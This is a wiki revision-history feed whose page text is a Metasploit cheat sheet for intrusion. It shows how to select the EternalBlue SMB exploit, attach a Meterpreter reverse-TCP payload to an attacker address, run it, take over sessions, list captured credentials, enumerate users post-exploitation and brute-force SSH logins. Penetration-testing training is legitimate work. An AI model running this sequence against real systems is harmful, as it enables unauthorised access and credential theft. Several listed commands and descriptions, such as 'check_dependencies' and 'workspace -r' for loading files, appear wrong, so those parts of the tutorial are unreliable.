<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://it-arts.net/index.php?action=history&amp;feed=atom&amp;title=METASPLOIT_-_Base_Commands</id>
	<title>METASPLOIT - Base Commands - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://it-arts.net/index.php?action=history&amp;feed=atom&amp;title=METASPLOIT_-_Base_Commands"/>
	<link rel="alternate" type="text/html" href="https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;action=history"/>
	<updated>2026-05-02T18:42:53Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.44.2</generator>
	<entry>
		<id>https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;diff=958&amp;oldid=prev</id>
		<title>Admin: Text replacement - &quot;Category:Wiki&quot; to &quot;Category:Wiki

&#039;&#039;&#039;&#039;&#039;[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]&#039;&#039;&#039;&#039;&#039;
&quot;</title>
		<link rel="alternate" type="text/html" href="https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;diff=958&amp;oldid=prev"/>
		<updated>2026-01-17T07:13:21Z</updated>

		<summary type="html">&lt;p&gt;Text replacement - &amp;quot;&lt;a href=&quot;/index.php/Category:Wiki&quot; title=&quot;Category:Wiki&quot;&gt;Category:Wiki&lt;/a&gt;&amp;quot; to &amp;quot;&lt;a href=&quot;/index.php/Category:Wiki&quot; title=&quot;Category:Wiki&quot;&gt;Category:Wiki&lt;/a&gt;  &amp;#039;&amp;#039;&amp;#039;&amp;#039;&amp;#039;[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]&amp;#039;&amp;#039;&amp;#039;&amp;#039;&amp;#039; &amp;quot;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 07:13, 17 January 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot;&gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;[[Category:Wiki]]&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;[[Category:Wiki]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&#039;&#039;&#039;&#039;&#039;[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]&#039;&#039;&#039;&#039;&#039;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Starting Metasploit Console ==&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Starting Metasploit Console ==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Admin</name></author>
	</entry>
	<entry>
		<id>https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;diff=473&amp;oldid=prev</id>
		<title>Admin at 16:35, 13 December 2025</title>
		<link rel="alternate" type="text/html" href="https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;diff=473&amp;oldid=prev"/>
		<updated>2025-12-13T16:35:34Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;a href=&quot;https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;amp;diff=473&amp;amp;oldid=472&quot;&gt;Show changes&lt;/a&gt;</summary>
		<author><name>Admin</name></author>
	</entry>
	<entry>
		<id>https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;diff=472&amp;oldid=prev</id>
		<title>Admin at 16:33, 13 December 2025</title>
		<link rel="alternate" type="text/html" href="https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;diff=472&amp;oldid=prev"/>
		<updated>2025-12-13T16:33:33Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;a href=&quot;https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;amp;diff=472&amp;amp;oldid=471&quot;&gt;Show changes&lt;/a&gt;</summary>
		<author><name>Admin</name></author>
	</entry>
	<entry>
		<id>https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;diff=471&amp;oldid=prev</id>
		<title>Admin: Created page with &quot;Category:Wiki  == Advanced Metasploit CLI Commands ==  === Starting Metasploit Console === To start the Metasploit Framework console, use the following command:  &lt;nowiki&gt; msfconsole &lt;/nowiki&gt;  This launches the Metasploit interactive console, where you can execute various commands for penetration testing.  === Search for Exploits === To search for a specific exploit module or vulnerability in Metasploit:  &lt;nowiki&gt; search &lt;search_term&gt; &lt;/nowiki&gt;  For example, to searc...&quot;</title>
		<link rel="alternate" type="text/html" href="https://it-arts.net/index.php?title=METASPLOIT_-_Base_Commands&amp;diff=471&amp;oldid=prev"/>
		<updated>2025-12-13T16:32:51Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&lt;a href=&quot;/index.php/Category:Wiki&quot; title=&quot;Category:Wiki&quot;&gt;Category:Wiki&lt;/a&gt;  == Advanced Metasploit CLI Commands ==  === Starting Metasploit Console === To start the Metasploit Framework console, use the following command:  &amp;lt;nowiki&amp;gt; msfconsole &amp;lt;/nowiki&amp;gt;  This launches the Metasploit interactive console, where you can execute various commands for penetration testing.  === Search for Exploits === To search for a specific exploit module or vulnerability in Metasploit:  &amp;lt;nowiki&amp;gt; search &amp;lt;search_term&amp;gt; &amp;lt;/nowiki&amp;gt;  For example, to searc...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;[[Category:Wiki]]&lt;br /&gt;
&lt;br /&gt;
== Advanced Metasploit CLI Commands ==&lt;br /&gt;
&lt;br /&gt;
=== Starting Metasploit Console ===&lt;br /&gt;
To start the Metasploit Framework console, use the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
msfconsole&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This launches the Metasploit interactive console, where you can execute various commands for penetration testing.&lt;br /&gt;
&lt;br /&gt;
=== Search for Exploits ===&lt;br /&gt;
To search for a specific exploit module or vulnerability in Metasploit:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
search &amp;lt;search_term&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For example, to search for exploits related to &amp;quot;Windows SMB&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
search smb windows&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will list all relevant exploits, auxiliary modules, and payloads.&lt;br /&gt;
&lt;br /&gt;
=== Show Available Modules ===&lt;br /&gt;
To list all available Metasploit modules, use:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
show modules&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads.&lt;br /&gt;
&lt;br /&gt;
=== Use an Exploit Module ===&lt;br /&gt;
To use an exploit module:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
use &amp;lt;module_path&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For example, to use an SMB exploit:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
use exploit/windows/smb/ms17_010_eternalblue&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This sets the module for use in the current session.&lt;br /&gt;
&lt;br /&gt;
=== Show Module Options ===&lt;br /&gt;
To view the options available for a specific module:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
show options&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This displays required and optional parameters for the current module.&lt;br /&gt;
&lt;br /&gt;
=== Set Module Options ===&lt;br /&gt;
To set the required parameters for an exploit, such as the target IP address:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
set RHOST &amp;lt;target_ip&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Replace `&amp;lt;target_ip&amp;gt;` with the actual target machine&amp;#039;s IP address. You can set other options in a similar way.&lt;br /&gt;
&lt;br /&gt;
=== Show Payloads ===&lt;br /&gt;
To list all available payloads for a specific exploit:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
show payloads&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will show the payloads compatible with the currently selected exploit.&lt;br /&gt;
&lt;br /&gt;
=== Select and Set Payload ===&lt;br /&gt;
To select and configure a payload:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
set PAYLOAD &amp;lt;payload_name&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For example, to set a reverse TCP payload:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can then set specific options for the payload, like the LHOST (local host IP):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
set LHOST &amp;lt;local_ip&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
### Example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
set LHOST 192.168.1.100&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Running the Exploit ===&lt;br /&gt;
Once the module and payload are set, you can run the exploit:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
exploit&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will execute the exploit and attempt to gain access to the target machine.&lt;br /&gt;
&lt;br /&gt;
=== Running the Exploit in Background ===&lt;br /&gt;
If you want to run the exploit in the background without blocking the terminal:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
exploit -j&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The `-j` flag runs the exploit as a background job.&lt;br /&gt;
&lt;br /&gt;
=== Show Sessions ===&lt;br /&gt;
To view active sessions after exploiting a target:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
sessions&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This command shows a list of all active sessions (Meterpreter or shell sessions).&lt;br /&gt;
&lt;br /&gt;
=== Interact with a Session ===&lt;br /&gt;
To interact with a specific session:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
sessions -i &amp;lt;session_id&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For example, to interact with session 1:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
sessions -i 1&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This gives you a shell or Meterpreter prompt for that session.&lt;br /&gt;
&lt;br /&gt;
=== Background a Session ===&lt;br /&gt;
To background a session and return to the main Metasploit console:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
background&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This command puts the current session in the background, allowing you to continue working on other tasks in the console.&lt;br /&gt;
&lt;br /&gt;
=== Session Cleanup ===&lt;br /&gt;
To terminate a specific session:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
sessions -k &amp;lt;session_id&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
sessions -k 1&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This closes session 1.&lt;br /&gt;
&lt;br /&gt;
=== Exploit Vulnerability Verification ===&lt;br /&gt;
To verify if a specific vulnerability exists on the target machine, use the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
check&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will run basic checks to determine if the target is vulnerable to the selected exploit.&lt;br /&gt;
&lt;br /&gt;
=== List Credentials ===&lt;br /&gt;
If you have gained access to the target system and want to list available credentials:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
creds&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This command shows all credentials (e.g., username and password pairs) captured during the session.&lt;br /&gt;
&lt;br /&gt;
=== Save Your Progress ===&lt;br /&gt;
To save the current state of your Metasploit session (including all modules, options, and sessions):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
save&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will save your current Metasploit environment to the default location.&lt;br /&gt;
&lt;br /&gt;
=== Load a Saved Workspace ===&lt;br /&gt;
To load a saved Metasploit workspace:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
workspace -r &amp;lt;workspace_file&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will restore your saved workspace, including all settings, modules, and sessions.&lt;br /&gt;
&lt;br /&gt;
=== Managing Workspaces ===&lt;br /&gt;
To list all available workspaces:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
workspace&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To create a new workspace:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
workspace -a &amp;lt;workspace_name&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To switch between workspaces:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
workspace &amp;lt;workspace_name&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
### Example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
workspace my_new_workspace&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Running Auxiliary Modules ===&lt;br /&gt;
To use an auxiliary module (e.g., a scanner):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
use auxiliary/scanner/portscan/tcp&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can then set the target and run the module just like with an exploit.&lt;br /&gt;
&lt;br /&gt;
=== Start a Post-Exploitation Module ===&lt;br /&gt;
Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
use post/windows/gather/enum_logged_on_users&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This collects information about logged-on users on the Windows target.&lt;br /&gt;
&lt;br /&gt;
=== Show Help for Commands ===&lt;br /&gt;
To get help for a specific command or module, use:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
help &amp;lt;command&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For example, to get help on the `sessions` command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
help sessions&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will display detailed usage instructions and options for the command.&lt;br /&gt;
&lt;br /&gt;
=== Advanced Search for Exploits ===&lt;br /&gt;
You can use advanced search queries to filter modules by specific parameters:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
search type:exploit platform:windows name:ms17_010&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This command searches for exploits related to the MS17-010 vulnerability on Windows platforms.&lt;br /&gt;
&lt;br /&gt;
=== Check for Dependencies ===&lt;br /&gt;
To check if a module has any missing dependencies before use:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
check_dependencies&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This command will list any missing libraries or files needed to run a module.&lt;br /&gt;
&lt;br /&gt;
=== Perform a Dictionary Attack ===&lt;br /&gt;
To use a dictionary attack against an SSH service, for example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
use auxiliary/scanner/ssh/ssh_login&lt;br /&gt;
set RHOSTS &amp;lt;target_ip&amp;gt;&lt;br /&gt;
set USER_FILE /path/to/usernames.txt&lt;br /&gt;
set PASS_FILE /path/to/passwords.txt&lt;br /&gt;
run&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This runs an SSH login brute-force attack using the specified username and password lists.&lt;br /&gt;
&lt;br /&gt;
=== Display Environment Variables ===&lt;br /&gt;
To display the current environment variables in Metasploit:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
env&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will show details about the current environment, including system and framework-specific variables.&lt;br /&gt;
&lt;br /&gt;
=== Exit Metasploit Console ===&lt;br /&gt;
To exit the Metasploit console:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
exit&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This command will close the Metasploit Framework console and return to the command-line prompt.&lt;/div&gt;</summary>
		<author><name>Admin</name></author>
	</entry>
</feed>